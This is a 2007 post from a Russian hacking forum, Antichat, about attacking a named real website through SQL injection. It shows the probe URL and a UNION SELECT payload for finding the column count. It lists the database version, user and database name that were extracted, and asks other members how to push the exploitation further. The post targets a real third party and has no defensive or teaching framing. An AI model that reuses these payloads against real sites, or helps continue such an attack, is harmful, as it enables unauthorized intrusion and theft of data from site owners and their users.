01.07.2007, 11:28
|
|
Познавший АНТИЧАТ
Регистрация: 21.03.2007
Сообщений: 1,200
Провел на форуме:
7134052
Репутация:
1204
|
|
nvmu.ru
Подозрение на инъекцию:
http://nvmu.ru/cgi-bin/index.cgi?page=1'
Подбираем кол-во колонок:
http://nvmu.ru/cgi-bin/index.cgi?page=-1%20union%20select%201,2,3,4,5/*
Version: MySQL 5.1.19-beta
User: nvmu@localhost
Database: nvmu
Вывод только в заголовке, прав на mysql.user не хватает, возможно как-нибудь нормально инъектироваться?
PS. Спасибо товарищу из аськи за наводку и заодно, что разбудил меня. =\
|
|
|